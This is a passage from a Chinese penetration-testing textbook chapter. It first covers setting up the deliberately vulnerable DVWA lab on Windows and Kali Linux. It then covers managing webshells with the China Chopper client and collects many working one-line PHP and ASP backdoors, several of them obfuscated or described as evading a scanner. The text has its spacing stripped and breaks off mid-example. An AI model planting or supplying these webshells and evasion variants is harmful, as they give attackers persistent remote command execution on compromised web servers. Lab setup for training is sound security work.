第一章滲透必備基礎技術第一節搭建DVWA滲透測試平臺第二節一句話后門利用及操作

第一節搭建DVWA滲透測試平臺

1.1.1Windows下搭建DVWA滲透測試平臺1.準備工作1)下載DVWA2)下載phpstudy2.安裝軟件(1)安裝phpstudy。(2)將DVWA解壓縮后的文件復制到phpstudy安裝時指定的WWW文件夾下。(3)設置php.ini參數。運行phpstudy后，根據操作系統平臺來選擇不同的架構，如圖1-1所示，安裝完成后到程序安裝目錄下找到php.ini文件，將參數由“allow_url_include?=?Off”修改為“allow_url_include=On”，這樣方便測試本地文件包含漏洞，保存后重啟Apache服務器。(4)修改DVWA數據庫配置文件。將“C:\phpstudy\WWW\dvwa\config\config.inc.php.dist”文件重命名為“config.inc.php”文件，修改其中的數據庫配置為實際對應的值，在本例中MySQL數據庫root密碼為root，因此修改值如下：$_DVWA['db_server']='';$_DVWA['db_database']='dvwa';$_DVWA['db_user']='root';$_DVWA['db_password']='root';3.安裝數據庫并測試在運行中輸入“cmd”→“ipconfig”命令獲取本機IP地址，本例中使用地址http://30/dvwa/setup.php。安裝DVWA，也可以使用localhost/dvwa/setup.php安裝，如圖1-2所示，根據提示操作即可完成安裝。安裝成功后，系統會自動跳轉到30/dvwa/login.php登錄頁面，默認登錄賬號和密碼為admin/password。登錄系統后，需要設置“DVWASecurity”安全等級，然后進行漏洞測試，如圖1-3所示。最后選擇對應級別分別為1、2、3、4提交后即可。1.1.2在Kali2016上安裝DVWA滲透測試平臺最新版的Kali(2017.2)安裝DVWA有一些問題，其默認php版本為php7.0，對DVWA環境不太匹配，但與Kali2016可以比較完美地結合。下面介紹如何使用Kali2016版本進行DVWA的安裝。1.下載KaliLinux2.0如果有時間可以自己先安裝虛擬機，然后再安裝KaliLinux2.0系統，對于這個過程已經很熟練的用戶，現成可用的虛擬機絕對是一個不錯的選擇。KaliLinux2.0目前在其官方網站上已經不能下載了，但可以通過btdig網站搜索來進行下載.2.下載DVWA最新版本3.平臺搭建(1)?apache2停止服務：serviceapache2stop(2)賦予dvwa文件夾相應的權限：chmod-R755/var/www/html/dvwa(3)開啟MySQL：servicemysqlstartmysql-urootusemysqlcreatedatabasedvwa；exit在Kali中創建DVWA數據庫，如圖1-4所示。(4)配置php-gd模塊支持：apt-getinstallphp7.0-gd(5)修改php.ini參數值allow_url_include。編輯?/etc/php/7.0/apache2/php.ini文件，修改812行“allow_url_include=Off”為“allow_url_include=On”，保存后退出。Vim編輯技巧：在鍵盤上使用Esc功能鍵后，輸入“:”，然后輸入“wq!”保存修改并退出Vim。(6)配置DVWA。打開終端，輸入以下命令，進入到dvwa文件夾，配置uploads文件夾和phpids_log.txt可讀可寫可執行權限。cd/var/www/html/dvwachown-R777www-data:www-data/var/www/html/dvwa/hackable/uploadschownwww-data:www-datachown-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt(7)生成配置文件config.inc.php：cp/var/www/html/dvwa/config/config.inc.php.dist/var/www/html/dvwa/config/config.inc.phpvim/var/www/html/dvwa/config/config.inc.php修改第18行中“db_password='p@ssw0rd'”為實際的密碼值，在本例中設置為空，如圖1-5所示。4.訪問并創建DVWA平臺打開瀏覽器輸入32/dvwa/setup.php。如圖1-6所示，除了Google的驗證碼是Missing外，其他均為Enabled。單擊創建(Create/ResetDatabase)，即可完成所有的配置。1.1.3在Kali2017上安裝DVWA滲透測試平臺最新版的Kali安裝DVWA有一些問題，研究發現，KaliLinux最新版本也可以使用DVWA，其前面出現無法使用是由于MySQL授權問題，按照本節介紹的方法即可解決。1.安裝之前的準備工作(1)下載KaliLinux最新版本。(2)下載DVWA最新版本。2.重新配置和安裝php-gd(1)安裝php-gd庫：aptinstallphp-gd(2)查看php版本。php-v執行后顯示結果如下：PHP7.0.22-3(cli)(built:Aug23201705:51:41)(NTS)Copyright(c)1997-2017ThePHPGroupZendEnginev3.0.0,Copyright(c)1998-2017ZendTechnologieswithZendOPcachev7.0.22-3,Copyright(c)1999-2017,byZendTechnologies(3)下載并將DVWA復制到網站目錄：gitclone/ethicalhack3r/DVWA.gitmvDVWA/var/www/html/dvwa(4)修改/etc/php/7.0/apache2/php.ini文件，設置allow_url_include=On，初始設置其值為Off。賦予dvwa文件夾相應的權限，接著在終端中輸入：chmod-R755/var/www/html/dvwachmod-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txtchmod-R777/var/www/html/dvwa/hackable/uploads(5)更改數據庫密碼和授權。登錄MySQL數據庫后執行命令：updateusersetpassword=password('12345678')whereuser='root'andhost='localhost';grantallprivilegeson*.*toroot@localhostidentifiedby'12345678';(6)修改數據庫配置文件密碼。cd/var/www/html/dvwa/configcpconfig.inc.php.distconfig.inc.php修改config.inc.php中的數據庫配置為實際配置即可。(7)啟動Apache2以及MySQL服務：serviceapache2restartservicemysqlrestart(8)通過瀏覽器對訪問DVWA網站并進行相應設置。

第二節一句話后門利用及操作

1.2.1中國菜刀使用及管理1.執行中國菜刀中國菜刀的英文名為“Chopper”，可以到官方網站進行下載，解壓縮后直接運行chopper.exe即可，如圖1-7所示。2.添加Webshell在中國菜刀中單擊右鍵，在彈出的菜單中選擇“添加”命令，即可添加Webshell地址，如圖1-8所示。在地址中輸入一句話木馬Webshell地址，地址后面是一句話木馬的連接密碼，在配置中選擇腳本類型，程序會自動識別腳本類型，最后單擊“添加”按鈕即可添加一個Webshell地址。對于存在文件解析漏洞的網站Webshell地址，需要手動設置腳本類型，例如1.asp;1.html等格式文件，可以確定腳本是ASP語言，其他語言類似。3.連接一句話后門回到中國菜刀主界面，雙擊剛才添加的Webshell地址，即可連接一句話后門，如圖1-9所示。如果后門執行成功，則會顯示該網站的目錄結構和詳細文件等信息。4.執行文件操作通過中國菜刀客戶端可以方便地對文件及文件夾等進行操作，如上傳文件、下載文件、編輯、刪除、復制、重命名、修改文件(夾)時間、新建和Access管理等，如圖1-10所示。在中國菜刀中還可以對數據庫進行管理，通過配置數據庫用戶名和用戶密碼等參數即可對數據庫進行相應操作。1.2.2有關一句話后門的收集與整理1．php非一句話經典后門php運行時如果遇見字符“?`?”(鍵盤上?~?符號的下擋鍵)總會嘗試著執行“`”里面包含的命令，并返回命令執行的結果(string類型)。其局限性在于特征碼比較明顯，“`”符號在php中很少用到，殺毒軟件很容易以此為特征碼掃描到并發出警報，而且“``”里面不能執行php代碼。將以下代碼保存為test.php：<?phpecho`$_REQUEST[id]`;?>執行代碼test.php?id=dirc:/，即可查看C盤文件，id后的參數可以直接執行命令。2．加密的asp一句話后門將以下代碼保存為asp文件，或者將以下代碼插入到asp文件中，然后通過“黑狐專用一句話木馬加強版”進行連接，其密碼為“#”，執行效果如圖1-11所示。<scriptlanguage=vbsrunat=server>Execute(HextoStr("65786563757465287265717565737428636872283335292929"))FunctionHextoStr(data)HextoStr="EXECUTE"""""C="&CHR(&H"N=")"DoWhileLen(data)>1IfIsNumeric(Left(data,1))ThenHextoStr=HextoStr&C&Left(data,2)&Ndata=Mid(data,3)ElseHextoStr=HextoStr&C&Left(data,4)&Ndata=Mid(data,5)EndIfLoopEndFunction</script><SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(String.fromCharCode(116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>3．新型ASP一句話后門<%Seto=Server.CreateObject("ScriptControl")o.language="vbscript"o.addcode(Request("cmd"))%>4．常見的asp一句話后門收集asp一句話木馬：<%%25Execute(request("a"))%%25><%Execute(request("a"))%>%><%executerequest("a")%><%<scriptlanguage=VBScriptrunat=server>executerequest("a")</script><%25Execute(request("a"))%25>%><%executerequest("yy")%><%executerequest(char(97))%><%evalrequest(char(97))%>":executerequest("value"):a="<scriptlanguage=VBScriptrunat=server>ifrequest(chr(35))<>""""thenExecuteGlobalrequest(chr(35))</script>在access數據庫中插入的一句話木馬：┼攠數畣整爠煥敵瑳∨∣┩愾┼癥污爠煥敵瑳∨≡┩>密碼為:autf-7的馬：<%@codepage=65000%><%response.Charset="936"%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>ScriptEncoder加密：<%@LANGUAGE=VBScript.Encode%><%#@~^PgAAAA==r6P.;!+/D`14Dv&X#*@!@*ErPPD4+P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb?*?oBMAAA==^#~@%>可以躲過雷客圖的一句話：<%setms=server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request",requestms.ExecuteStatement("ev"&"al(request(""1""))")%>php一句話：<?phpeval($_POST[cmd]);?><?php@eval($_POST[cmd]);?><?phpsystem($_REQUEST['cmd']);?><?phpeval($_POST[1]);?>aspx一句話：<scriptlanguage="C#"runat="server">WebAdmi